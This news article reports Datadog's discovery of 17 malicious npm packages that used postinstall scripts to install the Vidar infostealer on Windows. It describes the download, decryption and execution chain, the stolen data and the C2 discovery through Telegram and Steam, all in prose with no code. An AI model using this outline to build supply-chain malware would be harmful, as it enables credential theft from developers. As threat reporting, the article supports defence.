Datadog Security Research has uncovered a sophisticated supply chain attack targeting the npm ecosystem, involving 17 malicious packages across 23 releases designed to deliver the Vidar infostealer malware to Windows systems.
The campaign, attributed to a threat actor cluster tracked as MUT-4831, represents a significant escalation in npm-based threats and marks the first known public disclosure of Vidar malware being distributed through npm packages.
The malicious packages masquerade as legitimate software development kits and libraries, including fake Telegram bot helpers, icon libraries, and forked versions of popular projects like Cursor and React.
Despite their benign presentation on the npm registry, these packages execute destructive payloads through postinstall scripts that automatically run during installation.
Researchers discovered that the packages remained live on the npm registry for approximately two weeks before removal, during which they accumulated at least 2,240 downloads. The most popular malicious package, react-icon-pkg, was downloaded 503 times before being taken down.
The Discovery and Initial Attack Chain
Security researchers at Datadog detected the campaign on October 21, 2025, using GuardDog, their command-line static analyzer for identifying suspicious signatures in package code.
The initial detection flagged the package [email protected], revealing multiple malicious indicators, including silent process execution, suspicious network domains, and automatic installation scripts.
Over two burst periods in late October, researchers observed the two threat actors behind the campaign, operating under npm accounts “aartje” and “saliii229911,” publishing their weaponized packages.
The attack chain follows a straightforward three-step process executed during package installation. First, the postinstall script downloads an encrypted ZIP archive from a bullethost[.]cloud domain.
Second, the script decrypts and extracts the archive using hardcoded passwords. Third, it executes a Windows PE binary named bridle.exe from the extracted contents before performing cleanup operations.
Some variations of the campaign employed PowerShell scripts embedded directly in package.json files, suggesting the threat actors deliberately diversified their implementations to evade detection mechanisms.
Vidar Infostealer: The Second-Stage Payload
The extracted executable in every malicious package proved to be a Vidar v2 infostealer, a Go-compiled variant of the notorious information stealer that first emerged in 2018 as an evolution of the earlier Arkei trojan.
Unlike traditional Vidar samples written in C/C++, this variant represents a new generation of the malware with enhanced capabilities for compromising victim systems.
Once executed, Vidar aggressively harvests sensitive data including browser credentials, cookies, cryptocurrency wallets, and critical system files, then packages the stolen information into ZIP archives for exfiltration to command-and-control servers.
What distinguishes this Vidar variant is its infrastructure discovery mechanism, which relies on hardcoded Telegram and Steam accounts to retrieve active C2 domains dynamically.
The malware queries these social media profiles to discover which infrastructure is currently operational, allowing threat actors to rotate their command-and-control servers without requiring package updates.
Upon successful data theft, Vidar deletes all traces of itself from the victim system, significantly complicating post-compromise detection and incident response efforts for security teams.
The MUT-4831 campaign underscores the persistent vulnerability of open source package ecosystems to supply chain exploitation.
Both threat actor accounts were newly created and operated for only days before publication, indicating deliberate infrastructure setup specifically for this attack. Following discovery, npm permanently banned both accounts and removed all associated packages, though not before the malware reached hundreds of systems.
The campaign demonstrates that threat actors have learned npm provides a reliable initial access vector for delivering malware to millions of downstream users with minimal friction.
Datadog’s Supply-Chain Firewall technology offers one mitigation approach by blocking known-malicious packages before installation, potentially preventing costly incident response cycles before they begin.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.